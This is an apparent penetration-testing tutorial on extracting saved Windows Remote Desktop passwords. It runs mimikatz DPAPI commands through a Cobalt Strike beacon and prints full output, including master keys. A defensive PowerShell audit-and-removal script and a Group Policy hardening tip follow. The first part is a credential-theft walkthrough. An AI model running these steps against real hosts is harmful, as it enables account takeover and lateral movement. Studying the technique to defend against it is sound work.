
Internal network penetration testing: recovering saved Windows Remote Desktop (RDP) connection passwords

Precondition: when connecting with mstsc, the administrator ticked the option to save the password so the connection signs in automatically.

# You can check with cmdkey /list whether any credentials have been saved
>cmdkey /list


1. Locate the local Credentials files

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*


2. mimikatz

beacon> mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85


This yields guidMasterKey {877c4ae6-d114-4851-b9ab-c8d23c7f09a6}

3. Use sekurlsa::dpapi

beacon> mimikatz sekurlsa::dpapi
[*] Tasked beacon to run mimikatz's sekurlsa::dpapi command
[+] host called home, sent: 788081 bytes
[+] received output:

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-BVVD8VFVMPR$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-20


Authentication Id : 0 ; 283117 (00000000:000451ed)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN-BVVD8VFVMPR
Logon Server      : WIN-BVVD8VFVMPR
Logon Time        : 2022/6/20 12:24:48
SID               : S-1-5-21-2815261350-2957312007-627930173-500
	 [00000000]
	 * GUID      :	{877c4ae6-d114-4851-b9ab-c8d23c7f09a6}
	 * Time      :	2022/6/25 13:14:36
	 * MasterKey :	7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0
	 * sha1(key) :	d90d81651dc81f37b34698ac101cf04c094c0cde


Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-19


Authentication Id : 0 ; 46503 (00000000:0000b5a7)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : 


Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-BVVD8VFVMPR$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2022/6/20 12:24:39
SID               : S-1-5-18
	 [00000000]
	 * GUID      :	{62dbbb7e-3978-4e4a-bdd4-65a7fa11a0ce}
	 * Time      :	2022/6/25 12:58:55
	 * MasterKey :	54ef76dfc016a1471d59ce8d179ba455a201ca749ace616058b6ef0b8573e558cedb185d57d0bc1be40238da47d16a1124f3a69bbaccaf5f5b2e61bd637e9b73
	 * sha1(key) :	6aff948e5a90e41f2edffd26da163af4f146b1a5
	 [00000001]
	 * GUID      :	{43ea2159-28dc-4507-90bd-751f19e7db5d}
	 * Time      :	2022/6/20 12:24:39
	 * MasterKey :	cc412391998e555e76bfa10964c792fd675b037dec9c5be3b9456db4f5eb64022c0698d6960de4c0a8aca21586f5b445bf490c4a392014721636be5c5f75a3f8
	 * sha1(key) :	56b3c08a69e9c1a346e35fa4cb572b70cf5a158e
	 [00000002]
	 * GUID      :	{0fefdf3f-162a-4a3f-a6df-6ec2dee82eb5}
	 * Time      :	2022/6/25 12:58:55
	 * MasterKey :	89012fd9de4903051a9b99225216df633efd8d1e014624f0a68670432da8fc1fda98babc447d5de1d3fe10069a6358be9a64fb1f634cf6012307465455757369
	 * sha1(key) :	3604ef0e99dab0ea49db307fd8950b8fd0d4d310
	 [00000003]
	 * GUID      :	{3d58f13e-ba7c-4457-835c-5a7f1353590c}
	 * Time      :	2022/6/25 13:12:50
	 * MasterKey :	c12ff664090f806ae980d32bfe19af5ba76f3d5f1dcad46e70da7affaede04c02ba00d5d75380fd4bd77f6cd535be3eec103f2f5048ceee96d61347e3d24d7ba
	 * sha1(key) :	be0643a97d988adcc8e5ae2b3d6df9702df32dc0

Using guidMasterKey {877c4ae6-d114-4851-b9ab-c8d23c7f09a6}, locate the matching masterkey in the output above


MasterKey

7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0

4. Decrypt

mimikatz dpapi::cred /in:C:\Users\Administrator\AppData\Local\Microsoft\Credentials\A1AB82F3D34D455BC2EA963AE7B14B85 /masterkey:7ee7b210867c0bb32fe4414c0c56909f1716ec3b40eb2db824aa317701f87a3bae1df728cb513f7f94e34ad50df6915578464ac708ad7c96a30aa3d96dfcc3c0

The TaoWu plugin for Cobalt Strike (cs) also has a module that achieves the same result: retrieving the saved passwords from Windows Remote Desktop connection records.
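From the defender's side, the same two facts the post relies on (cmdkey /list shows the saved TERMSRV/ entries, and the DPAPI blobs live under %LOCALAPPDATA%\Microsoft\Credentials) are what an administrator can use to audit and clean up a host. The following PowerShell script is an added example, not code from the original post or from mimikatz or TaoWu; it assumes cmdkey.exe is available and that it is run as the user whose saved credentials are being audited. Names such as Get-SavedRdpCredential and the -Remove switch are the example's own.

```powershell
# Audit (and optionally clear) RDP credentials that mstsc saved for the current user.
# Added example: lists the saved TERMSRV/ entries from cmdkey /list, shows the
# DPAPI-protected blob files that back them, and removes the entries when -Remove is given.
# Assumptions: cmdkey.exe is present; the script runs as the user whose vault is audited.
param(
    [switch]$Remove   # without this switch the script only reports, it changes nothing
)

function Get-SavedRdpCredential {
    # cmdkey /list prints one block per entry with "Target:", "Type:" and "User:" lines.
    $lines = cmdkey /list 2>$null
    $entries = @()
    $current = $null
    foreach ($line in $lines) {
        $t = $line.Trim()
        if ($t -like 'Target:*') {
            if ($current) { $entries += $current }
            $current = [pscustomobject]@{ Target = $t.Substring(7).Trim(); Type = ''; User = '' }
        } elseif ($current -and $t -like 'Type:*') {
            $current.Type = $t.Substring(5).Trim()
        } elseif ($current -and $t -like 'User:*') {
            $current.User = $t.Substring(5).Trim()
        }
    }
    if ($current) { $entries += $current }
    # mstsc stores its saved logons under targets of the form TERMSRV/<host>.
    $entries | Where-Object { $_.Target -match 'TERMSRV/' }
}

function Get-CredentialBlobFile {
    # The same directory the post lists with "dir /a"; -Force shows hidden/system files.
    $dir = Join-Path $env:LOCALAPPDATA 'Microsoft\Credentials'
    if (Test-Path $dir) {
        Get-ChildItem -Path $dir -Force -File | Select-Object Name, Length, LastWriteTime
    }
}

$rdp = @(Get-SavedRdpCredential)
if ($rdp.Count -eq 0) {
    Write-Host 'No saved RDP credentials found for the current user.'
    return
}

Write-Host "Saved RDP credentials ($($rdp.Count)):"
$rdp | Format-Table Target, Type, User -AutoSize

Write-Host 'Credential blob files (DPAPI-protected with the user master key):'
Get-CredentialBlobFile | Format-Table -AutoSize

if ($Remove) {
    foreach ($e in $rdp) {
        # cmdkey shows "Domain:target=TERMSRV/host"; /delete wants only the TERMSRV/host part.
        $name = ($e.Target -split 'target=')[-1]
        Write-Host "Removing saved credential for $name"
        cmdkey /delete:$name | Out-Null
    }
}
```

Run it without arguments first to see what would be removed, then with -Remove to clear the entries; deleting an entry removes the blob that dpapi::cred would otherwise decrypt. To stop the credentials being saved in the first place, the Group Policy setting "Do not allow passwords to be saved" under Remote Desktop Services > Remote Desktop Connection Client disables the checkbox in mstsc that the post's precondition depends on.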
